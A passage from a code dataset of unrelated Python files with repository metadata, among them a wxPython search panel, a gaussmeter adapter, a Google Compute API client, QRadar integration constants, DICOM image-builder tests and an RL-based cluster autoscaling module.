self.assertEqual("beautiful", config.get("overwrite_setting"))
# this will take the setting form config2.
self.assertEqual("hi", config.get("setting_from_config2"))
def test_get_with_missing_key_and_no_default(self):
|
"An error should be thrown if the key is missing and no default provided."
config = ConfigReader("tests/TestConfig2;tests/TestConfig1")
# should take config from config1
self.assertRaises(KeyError, config.get, "setting_that_doesnt_exist")
def test_spe
|
cifying_bad_config_file(self):
"Test error is thrown when invalid config file is specified."
self.assertRaises(ConfigFileReadError, ConfigReader, "tests/TestConfig1,NOSUCHFILE")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
unreal666/outwiker
|
src/outwiker/gui/searchreplacepanel.py
|
Python
|
gpl-3.0
| 6,309
| 0
|
# -*- coding: utf-8 -*-
import os.path
import wx
from outwiker.core.system import getImagesDir
class SearchReplacePanel (wx.Panel):
def __init__(self, parent):
super(SearchReplacePanel, self).__init__(
parent,
style=wx.TAB_TRAVERSAL | wx.RAISED_BORDER)
self._controller = None
self._createGui()
self._bindEvents()
# Список элементов, относящихся к замене
self._replaceGui = [self._replaceLabel,
self._replaceText,
self._replaceBtn,
self._replaceAllBtn,
]
self.setReplaceGuiVisible(False)
def setController(self, controller):
self._controller = controller
@property
def searchTextCtrl(self):
return self._searchText
@property
def replaceTextCtrl(self):
return self._replaceText
@property
def resultLabel(self):
return self._resultLabel
def setReplaceGuiVisible(self, visible):
"""
Установить, нужно ли показывать элементы GUI для замены
"""
for item in self._replaceGui:
item.Show(visible)
self.Layout()
def _bindEvents(self):
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._searchText)
self.Bind(wx.EVT_TEXT_ENTER, self.__onEnterPress, self._replaceText)
self.Bind(wx.EVT_TEXT, self.__onSearchTextChange, self._searchText)
self.Bind(wx.EVT_BUTTON, self.__onNextSearch, self._nextSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onPrevSearch, self._prevSearchBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplace, self._replaceBtn)
self.Bind(wx.EVT_BUTTON, self.__onReplaceAll, self._replaceAllBtn)
self.Bind(wx.EVT_BUTTON, self.__onCloseClick, self._closeBtn)
for child in self.GetChildren():
child.Bind(wx.EVT_KEY_DOWN, self.__onKeyPressed)
def _createGui(self):
|
# Поле для ввода искомой фразы
self._searchText = wx.TextCtrl(self, -1, u"",
style=wx.TE_PROCESS_ENTER)
# Текст для замены
self._replaceText = wx.TextCtrl(self, -1, u"",
|
style=wx.TE_PROCESS_ENTER)
# Элементы интерфейса, связанные с поиском
self._findLabel = wx.StaticText(self, -1, _(u"Find what: "))
# Кнопка "Найти далее"
self._nextSearchBtn = wx.Button(self, -1, _(u"Next"))
# Кнопка "Найти выше"
self._prevSearchBtn = wx.Button(self, -1, _(u"Prev"))
# Метка с результатом поиска
self._resultLabel = wx.StaticText(self, -1, "")
self._resultLabel.SetMinSize((150, -1))
# Элементы интерфейса, связанные с заменой
self._replaceLabel = wx.StaticText(self, -1, _(u"Replace with: "))
# Кнопка "Заменить"
self._replaceBtn = wx.Button(self, -1, _(u"Replace"))
# Кнопка "Заменить все"
self._replaceAllBtn = wx.Button(self, -1, _(u"Replace All"))
self._closeBtn = wx.BitmapButton(
self,
-1,
wx.Bitmap(os.path.join(getImagesDir(), "close-button.png"),
wx.BITMAP_TYPE_ANY))
self._layout()
def _layout(self):
self._mainSizer = wx.FlexGridSizer(cols=6)
self._mainSizer.AddGrowableCol(1)
# Элементы интерфейса для поиска
self._mainSizer.Add(self._findLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._searchText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._nextSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._prevSearchBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._closeBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=1)
self._mainSizer.Add(self._resultLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
# Элементы интерфейса для замены
self._mainSizer.Add(self._replaceLabel, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceText, 0, wx.ALL |
wx.EXPAND | wx.ALIGN_CENTER_VERTICAL, border=2)
self._mainSizer.Add(self._replaceBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
self._mainSizer.Add(self._replaceAllBtn, 0, wx.ALL |
wx.ALIGN_CENTER_VERTICAL | wx.EXPAND, border=1)
# self._mainSizer.AddStretchSpacer()
# self._mainSizer.AddStretchSpacer()
self.SetSizer(self._mainSizer)
self.Layout()
def __onNextSearch(self, event):
if self._controller is not None:
self._controller.nextSearch()
def __onPrevSearch(self, event):
if self._controller is not None:
self._controller.prevSearch()
def __onReplace(self, event):
if self._controller is not None:
self._controller.replace()
def __onReplaceAll(self, event):
if self._controller is not None:
self._controller.replaceAll()
def __onSearchTextChange(self, event):
if self._controller is not None:
self._controller.enterSearchPhrase()
def __onKeyPressed(self, event):
key = event.GetKeyCode()
if key == wx.WXK_ESCAPE:
self.Close()
event.Skip()
def __onEnterPress(self, event):
if self._controller is None:
return
if self._replaceText.IsShown():
self._controller.replace()
else:
self._controller.nextSearch()
def __onCloseClick(self, event):
self.Close()
|
MichalKononenko/MrFreeze
|
mr_freeze/devices/lakeshore_475.py
|
Python
|
agpl-3.0
| 2,013
| 0.000497
|
"""
Contains methods for working with the Lakeshore 475 Gaussmeter
"""
from quantities import Quantity
from typing import Optional
from instruments.lakeshore import Lakeshore475 as _Lakeshore475
from time import sleep
class Lakeshore475(object):
"""
Adapter layer for IK's Lakeshore 475 implementation
"""
_port = '/dev/ttyUSB0'
_address = 12
_managed_instance = None
_constructor = _Lakeshore475
@property
def port_name(self) -> str:
"""
:return: The port to which this magnetometer will be attached
"""
return self._port
@port_name.setter
def port_name(self, new_port_name: str) -> None:
"""
:param new_port_name: The new port
:return:
"""
self._port = new_port_name
@property
def address(self) -> int:
"""
:return: The address
"""
return self._address
@address.setter
def address(self, new_address: int) -> None:
"""
:param new_address: The desired address
:return:
"""
self._address = new_address
@property
def _magnetometer(self) -> Optional[_Lakeshore475]:
"""
|
:return: The instance of
|
the magnetometer that this adapter manages, or
None if there is no instance.
.. note::
The 1 second delay is required for the gaussmeter to reset
itself and accept commands
"""
if self._managed_instance is None:
self._managed_instance = self._constructor.open_gpibusb(
port=self.port_name, gpib_address=self.address)
sleep(1)
return self._managed_instance
@property
def field(self) -> Quantity:
"""
:return: The measured magnetic field from the Gaussmeter
"""
try:
return self._magnetometer.field
except ValueError:
return -100000.0 * self._magnetometer.field_units # type:
# Quantity
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/scripts/apps/packagemanager/script_settings.py
|
Python
|
gpl-3.0
| 87
| 0.022989
|
../../../../../../.
|
./share/pyshared/orca/scripts/apps/packagemanager
|
/script_settings.py
|
googleapis/python-compute
|
google/cloud/compute_v1/services/target_tcp_proxies/client.py
|
Python
|
apache-2.0
| 42,291
| 0.001537
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
|
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import M
|
utualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.compute_v1.services.target_tcp_proxies import pagers
from google.cloud.compute_v1.types import compute
from .transports.base import TargetTcpProxiesTransport, DEFAULT_CLIENT_INFO
from .transports.rest import TargetTcpProxiesRestTransport
class TargetTcpProxiesClientMeta(type):
"""Metaclass for the TargetTcpProxies client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TargetTcpProxiesTransport]]
_transport_registry["rest"] = TargetTcpProxiesRestTransport
def get_transport_class(cls, label: str = None,) -> Type[TargetTcpProxiesTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class TargetTcpProxiesClient(metaclass=TargetTcpProxiesClientMeta):
"""The TargetTcpProxies API."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "compute.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TargetTcpProxiesClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TargetTcpProxiesTransport:
"""Returns the transport used by the client instance.
Returns:
TargetTcpProxiesTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/
|
demisto/content
|
Packs/QRadar/Integrations/QRadar_v3/QRadar_v3.py
|
Python
|
mit
| 164,136
| 0.003649
|
import concurrent.futures
import secrets
from enum import Enum
from ipaddress import ip_address
from typing import Tuple, Set, Dict, Callable
from urllib import parse
import pytz
import urllib3
from CommonServerUserPython import * # noqa
from CommonServerPython import * # noqa # pylint: disable=unused-wildcard-import
# Disable insecure warnings
urllib3.disable_warnings() # pylint: disable=no-member
''' ADVANCED GLOBAL PARAMETERS '''
SAMPLE_SIZE = 2 # number of samples to store in integration context
EVENTS_INTERVAL_SECS = 15 # interval between events polling
EVENTS_FAILURE_LIMIT = 3 # amount of consecutive failures events fetch will tolerate
FAILURE_SLEEP = 15 # sleep between consecutive failures events fetch
FETCH_SLEEP = 60 # sleep between fetc
|
hes
BATCH_SIZE = 100 # batch size used for offense ip enrichment
OFF_ENRCH_LIMIT = BATCH_SIZE * 10 # max amount of IPs to enrich per offense
MAX_WORKERS = 8 # max concurrent workers used for events enriching
DOMAIN_ENRCH_FLG = 'true' # when set to true, will try to enrich offense and assets with domain names
RULES_ENRCH_FLG = 'true' # when set to
|
true, will try to enrich offense with rule names
MAX_FETCH_EVENT_RETIRES = 3 # max iteration to try search the events of an offense
SLEEP_FETCH_EVENT_RETIRES = 10 # sleep between iteration to try search the events of an offense
MAX_NUMBER_OF_OFFENSES_TO_CHECK_SEARCH = 5 # Number of offenses to check during mirroring if search was completed.
DEFAULT_EVENTS_TIMEOUT = 30 # default timeout for the events enrichment in minutes
PROFILING_DUMP_ROWS_LIMIT = 20
ADVANCED_PARAMETERS_STRING_NAMES = [
'DOMAIN_ENRCH_FLG',
'RULES_ENRCH_FLG',
]
ADVANCED_PARAMETER_INT_NAMES = [
'EVENTS_INTERVAL_SECS',
'EVENTS_FAILURE_LIMIT',
'FAILURE_SLEEP',
'FETCH_SLEEP',
'BATCH_SIZE',
'OFF_ENRCH_LIMIT',
'MAX_WORKERS',
'MAX_FETCH_EVENT_RETIRES',
'SLEEP_FETCH_EVENT_RETIRES',
'DEFAULT_EVENTS_TIMEOUT',
'PROFILING_DUMP_ROWS_LIMIT',
]
''' CONSTANTS '''
API_USERNAME = '_api_token_key'
RESET_KEY = 'reset'
LAST_FETCH_KEY = 'id'
MINIMUM_API_VERSION = 10.1
DEFAULT_RANGE_VALUE = '0-49'
DEFAULT_TIMEOUT_VALUE = '35'
DEFAULT_LIMIT_VALUE = 50
MAXIMUM_MIRROR_LIMIT = 100
DEFAULT_EVENTS_LIMIT = 20
MAXIMUM_OFFENSES_PER_FETCH = 50
DEFAULT_OFFENSES_PER_FETCH = 20
DEFAULT_MIRRORING_DIRECTION = 'No Mirroring'
MIRROR_OFFENSE_AND_EVENTS = 'Mirror Offense and Events'
MIRROR_DIRECTION: Dict[str, Optional[str]] = {
'No Mirroring': None,
'Mirror Offense': 'In',
MIRROR_OFFENSE_AND_EVENTS: 'In'
}
MIRRORED_OFFENSES_CTX_KEY = 'mirrored_offenses'
UPDATED_MIRRORED_OFFENSES_CTX_KEY = 'updated_mirrored_offenses'
RESUBMITTED_MIRRORED_OFFENSES_CTX_KEY = 'resubmitted_mirrored_offenses'
UTC_TIMEZONE = pytz.timezone('utc')
ID_QUERY_REGEX = re.compile(r'(?:\s+|^)id((\s)*)>(=?)((\s)*)((\d)+)(?:\s+|$)')
ASCENDING_ID_ORDER = '+id'
EXECUTOR = concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS)
''' OUTPUT FIELDS REPLACEMENT MAPS '''
OFFENSE_OLD_NEW_NAMES_MAP = {
'credibility': 'Credibility',
'relevance': 'Relevance',
'severity': 'Severity',
'assigned_to': 'AssignedTo',
'destination_networks': 'DestinationHostname',
'status': 'Status',
'closing_user': 'ClosingUser',
'closing_reason_id': 'ClosingReason',
'close_time': 'CloseTime',
'categories': 'Categories',
'follow_up': 'Followup',
'id': 'ID',
'description': 'Description',
'source_address_ids': 'SourceAddress',
'local_destination_address_ids': 'DestinationAddress',
'remote_destination_count': 'RemoteDestinationCount',
'start_time': 'StartTime',
'event_count': 'EventCount',
'flow_count': 'FlowCount',
'offense_source': 'OffenseSource',
'magnitude': 'Magnitude',
'last_updated_time': 'LastUpdatedTime',
'offense_type': 'OffenseType',
'protected': 'Protected',
'LinkToOffense': 'LinkToOffense',
'rules': 'Rules',
'domain_name': 'DomainName',
'assets': 'Assets'
}
CLOSING_REASONS_OLD_NEW_MAP = {
'id': 'ID',
'text': 'Name',
'is_reserved': 'IsReserved',
'is_deleted': 'IsDeleted'
}
NOTES_OLD_NEW_MAP = {
'id': 'ID',
'note_text': 'Text',
'create_time': 'CreateTime',
'username': 'CreatedBy'
}
RULES_OLD_NEW_MAP = {
'owner': 'Owner',
'base_host_id': 'BaseHostID',
'capacity_timestamp': 'CapacityTimestamp',
'origin': 'Origin',
'creation_date': 'CreationDate',
'type': 'Type',
'enabled': 'Enabled',
'modification_date': 'ModificationDate',
'name': 'Name',
'average_capacity': 'AverageCapacity',
'id': 'ID',
'base_capacity': 'BaseCapacity'
}
RULES_GROUP_OLD_NEW_MAP = {
'owner': 'Owner',
'modified_time': 'ModifiedTime',
'level': 'Level',
'name': 'Name',
'description': 'Description',
'id': 'ID',
'child_groups': 'ChildGroups',
'child_items': 'ChildItems',
'type': 'Type',
'parent_id': 'ParentID'
}
ASSET_OLD_NEW_MAP = {
'vulnerability_count': 'VulnerabilityCount',
'interfaces': 'Interfaces',
'risk_score_sum': 'RiskScoreSum',
'hostnames': 'Hostnames',
'id': 'ID',
'users': 'Users',
'domain_id': 'DomainID',
'properties': 'Properties',
'products': 'Products'
}
SEARCH_OLD_NEW_MAP = {'search_id': 'ID', 'status': 'Status'}
REFERENCE_SETS_OLD_NEW_MAP = {
'number_of_elements': 'NumberOfElements',
'name': 'Name',
'creation_time': 'CreationTime',
'element_type': 'ElementType',
'time_to_live': 'TimeToLive',
'timeout_type': 'TimeoutType',
'data': 'Data',
}
REFERENCE_SET_DATA_OLD_NEW_MAP = {
'last_seen': 'LastSeen',
'source': 'Source',
'value': 'Value',
'first_seen': 'FirstSeen'
}
DOMAIN_OLD_NEW_MAP = {
'asset_scanner_ids': 'AssetScannerIDs',
'custom_properties': 'CustomProperties',
'deleted': 'Deleted',
'description': 'Description',
'event_collector_ids': 'EventCollectorIDs',
'flow_collector_ids': 'FlowCollectorIDs',
'flow_source_ids': 'FlowSourceIDs',
'id': 'ID',
'log_source_ids': 'LogSourceIDs',
'log_source_group_ids': 'LogSourceGroupIDs',
'name': 'Name',
'qvm_scanner_ids': 'QVMScannerIDs',
'tenant_id': 'TenantID'
}
SAVED_SEARCH_OLD_NEW_MAP = {
'owner': 'Owner',
'description': 'Description',
'creation_date': 'CreationDate',
'uid': 'UID',
'database': 'Database',
'is_quick_search': 'QuickSearch',
'name': 'Name',
'modified_date': 'ModifiedDate',
'id': 'ID',
'aql': 'AQL',
'is_shared': 'IsShared'
}
IP_GEOLOCATION_OLD_NEW_MAP = {
'continent': 'Continent',
'traits': 'Traits',
'geo_json': 'Geolocation',
'city': 'City',
'ip_address': 'IPAddress',
'represented_country': 'RepresentedCountry',
'registered_country': 'RegisteredCountry',
'is_local': 'IsLocalCountry',
'location': 'Location',
'postal': 'Postal',
'physical_country': 'PhysicalCountry',
'subdivisions': 'SubDivisions'
}
LOG_SOURCES_OLD_NEW_MAP = {
'sending_ip': 'SendingIP',
'internal': 'Internal',
'protocol_parameters': 'ProtocolParameters',
'description': 'Description',
'enabled': 'Enabled',
'group_ids': 'GroupIDs',
'credibility': 'Credibility',
'id': 'ID',
'protocol_type_id': 'ProtocolTypeID',
'creation_date': 'CreationDate',
'name': 'Name',
'modified_date': 'ModifiedDate',
'auto_discovered': 'AutoDiscovered',
'type_id': 'TypeID',
'last_event_time': 'LastEventTime',
'gateway': 'Gateway',
'status': 'Status'
}
USECS_ENTRIES = {'last_persisted_time',
'start_time',
'close_time',
'create_time',
'creation_time',
'creation_date',
'last_updated_time',
'first_persisted_time',
'modification_date',
'last_seen',
'first_seen',
'starttime',
'devicetime',
'last_reported',
'created',
'last_seen_profiler',
'last_seen_scanner',
'first_seen_scanner',
'first_se
|
comic/comic-django
|
app/tests/cases_tests/test_dicom.py
|
Python
|
apache-2.0
| 5,037
| 0
|
import os
from collections import defaultdict
from dataclasses import asdict
from pathlib import Path
from unittest import mock
import numpy as np
import pydicom
import pytest
from panimg.image_builders.dicom import (
_get_headers_by_study,
_validate_dicom_files,
format_error,
image_builder_dicom,
)
from panimg.image_builders.metaio_utils import parse_mh_header
from panimg.panimg import _build_files
from grandchallenge.cases.models import Image
from tests.cases_tests import RESOURCE_PATH
DICOM_DIR = RESOURCE_PATH / "dicom"
def test_get_headers_by_study():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 1
for key in studies:
assert [str(x["file"]) for x in studies[key]["headers"]] == [
f"{DICOM_DIR}/{x}.dcm" for x in range(1, 77)
]
for root, _, files in os.walk(RESOURCE_PATH):
files = [Path(root).joinpath(f) for f in files]
break
studies = _get_headers_by_study(files, defaultdict(list))
assert len(studies) == 0
def test_validate_dicom_files():
files = [Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]]
studies = _validate_dicom_files(files, defaultdict(list))
assert len(studies) == 1
for study in studies:
headers = study.headers
assert study.n_time == 19
assert study.n_slices == 4
with mock.patch(
"panimg.image_builders.dicom._get_headers_by_study",
return_value={
"foo": {"headers": header
|
s[1:], "file": "bar", "index": 1},
},
):
errors = defaultdict(list)
studies = _validate_dicom_files(files, errors)
assert len(studies) == 0
for header in headers[1:]:
assert errors[header["file"]] == [
format_error("Number of slices per time point differs")
]
|
def test_image_builder_dicom_4dct(tmpdir):
files = {Path(d[0]).joinpath(f) for d in os.walk(DICOM_DIR) for f in d[2]}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert result.consumed_files == {
Path(DICOM_DIR).joinpath(f"{x}.dcm") for x in range(1, 77)
}
assert len(result.new_images) == 1
image = Image(**asdict(result.new_images.pop()))
assert image.shape == [19, 4, 2, 3]
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
direction = headers["TransformMatrix"].split()
origin = headers["Offset"].split()
spacing = headers["ElementSpacing"].split()
exposures = headers["Exposures"].split()
content_times = headers["ContentTimes"].split()
assert len(exposures) == 19
assert exposures == [str(x) for x in range(100, 2000, 100)]
assert len(content_times) == 19
assert content_times == [str(x) for x in range(214501, 214520)]
dcm_ref = pydicom.dcmread(str(DICOM_DIR / "1.dcm"))
assert np.array_equal(
np.array(list(map(float, direction))).reshape((4, 4)), np.eye(4)
)
assert np.allclose(
list(map(float, spacing))[:2],
list(map(float, list(dcm_ref.PixelSpacing),)),
)
assert np.allclose(
list(map(float, origin)),
list(map(float, dcm_ref.ImagePositionPatient)) + [0.0],
)
@pytest.mark.parametrize(
"folder,element_type",
[
("dicom", "MET_SHORT"),
("dicom_intercept", "MET_FLOAT"),
("dicom_slope", "MET_FLOAT"),
],
)
def test_dicom_rescaling(folder, element_type, tmpdir):
"""
2.dcm in dicom_intercept and dicom_slope has been modified to add a
small intercept (0.01) or slope (1.001) respectively.
"""
files = [
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / folder)
for f in d[2]
]
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["ElementType"] == element_type
def test_dicom_window_level(tmpdir):
files = {
Path(d[0]).joinpath(f)
for d in os.walk(RESOURCE_PATH / "dicom")
for f in d[2]
}
result = _build_files(
builder=image_builder_dicom, files=files, output_directory=tmpdir
)
assert len(result.new_image_files) == 1
mha_file_obj = [
x for x in result.new_image_files if x.file.suffix == ".mha"
][0]
headers = parse_mh_header(mha_file_obj.file)
assert headers["WindowCenter"] == "30"
assert headers["WindowWidth"] == "200"
assert len(result.new_images) == 1
image_obj = result.new_images.pop()
assert image_obj.window_center == 30.0
assert image_obj.window_width == 200.0
|
cmantas/tiramola_v3
|
new_decision_module.py
|
Python
|
apache-2.0
| 36,005
| 0.007055
|
__author__ = 'tiramola group'
import os, datetime, operator, math, random, itertools, time
import numpy as np
from lib.fuzz import fgraph, fset
from scipy.cluster.vq import kmeans2
from lib.persistance_module import env_vars
from scipy.stats import linregress
from collections import deque
from lib.tiramola_logging import get_logger
from Predictor import Predictor
class RLDecisionMaker:
def __init__(self, cluster):
#Create logger
LOG_FILENAME = 'files/logs/Coordinator.log'
self.log = get_logger('RLDecisionMaker', 'INFO', logfile=LOG_FILENAME)
self.log.info("Using 'gain' : " + env_vars['gain'] +" with threshold of "+str( env_vars["decision_threshold"]*100) + "% and interval: " + str(env_vars['decision_interval']))
self.log.info("Cluster Size from %d to %d nodes" % (env_vars['min_cluster_size'], env_vars['max_cluster_size']))
self.debug = False
if self.debug:
self.currentState = 8
else:
self.currentState = cluster.node_count()
self.cluster = cluster
self.nextState = self.currentState
self.waitForIt = env_vars['decision_interval'] / env_vars['metric_fetch_interval']
self.pending_action = None
self.decision = {"action": "PASS", "count": 0}
# The policy for getting throughput and latency when computing the reward func.
# average, centroid
self.measurementsPolicy = 'centroid'
self.prediction = env_vars['use_prediction']
self.predictor = Predictor()
# used only in simulation!!
self.countdown = 0
# A dictionary that will remember rewards and metrics in states previously visited
self.memory = {}
for i in range(env_vars["min_cluster_size"], env_vars["max_cluster_size"] + 1):
self.memory[str(i)] = {}
#self.memory[str(i)]['V'] = None # placeholder for rewards and metrics
self.memory[str(i)]['r'] = None
self.memory[str(i)]['arrayMeas'] = None
# Load any previous statics.
self.measurementsFile = env_vars["measurements_file"]
self.trainingFile = env_vars["training_file"]
self.sumMetrics = {}
# initialize measurements file
meas = open(self.measurementsFile, 'a+')
if os.stat(self.measurementsFile).st_size == 0:
# The file is empty, set the headers for each column.
meas.write('State\t\tLambda\t\tThroughput\t\tLatency\t\tCPU\t\tTime\n')
meas.close()
# load training set
meas = open(self.trainingFile, 'r+')
if os.stat(self.trainingFile).st_size != 0:
# Read the training set measurements saved in the file.
meas.next() # Skip the first line with the headers of the columns
for line in meas:
# Skip comments (used in training sets)
if not line.startswith('###'):
m = line.split('\t\t')
self.add_measurement(m)
meas.close()
def add_measurement(self, metrics, write_file=False, write_mem=True):
"""
adds the measurement to either memory or file or both
@param metrics: array The metrics to store. An array containing [state, lamdba, throughput, latency, time]
@param writeFile: boolean If set write the measurement in the txt file
:return:
"""
if self.measurementsPolicy.startswith('average'):
if not self.sumMetrics.has_key(metrics[0]):
# Save the metric with the state as key metrics = [state, inlambda, throughput, latency]
self.sumMetrics[metrics[0]] = {'inlambda': 0.0, 'throughput': 0.0, 'latency': 0.0, 'divide_by': 0}
self.sumMetrics[metrics[0]] = {'inlambda': self.sumMetrics[metrics[0]]['inlambda'] + float(metrics[1]),
'throughput': self.sumMetrics[metrics[0]]['throughput'] + float(metrics[2]),
'latency': self.sumMetrics[metrics[0]]['latency'] + float(metrics[3]),
'divide_by': self.sumMetrics[metrics[0]]['divide_by'] + 1}
if self.debug and write_file:
self.log.debug("add_measurements: won't load measurement to memory")
else:
if write_mem:
# metrics-> 0: state, 1: lambda, 2: thoughtput, 3:latency, 4:cpu, 5:time
if not self.memory.has_key(metrics[0]):
self.memory[str(metrics[0])] = {}
#self.memory[str(metrics[0])]['V'] = None # placeholder for rewards and metrics
self.memory[str(metrics[0])]['r'] = None
self.memory[str(metrics[0])]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
elif self.memory[metrics[0]]['arrayMeas'] is None:
self.memory[metrics[0]]['arrayMeas'] = np.array([float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])], ndmin=2)
else:
self.memory[metrics[0]]['arrayMeas'] = np.append(self.memory[metrics[0]]['arrayMeas'],
[[float(metrics[1]), float(metrics[2]),
float(metrics[3]), float(metrics[4])]], axis=0)
# but add 1 zero measurement for each state for no load cases ??? too many 0s affect centroids?
if write_file:
if write_mem:
used = "Yes"
else:
used = "No"
ms = open(self.measurementsFile, 'a')
# metrics[5] contains the time tick -- when running a simulation, it represents the current minute,
# on actual experiments, it is the current time. Used for debugging and plotting
ms.write(str(metrics[0]) + '\t\t' + str(metrics[1]) + '\t\t' + str(metrics[2]) + '\t\t' +
str(metrics[3]) + '\t\t' + str(metrics[4]) + '\t\t' + str(metrics[5]) + '\t\t'+ used+'\n')
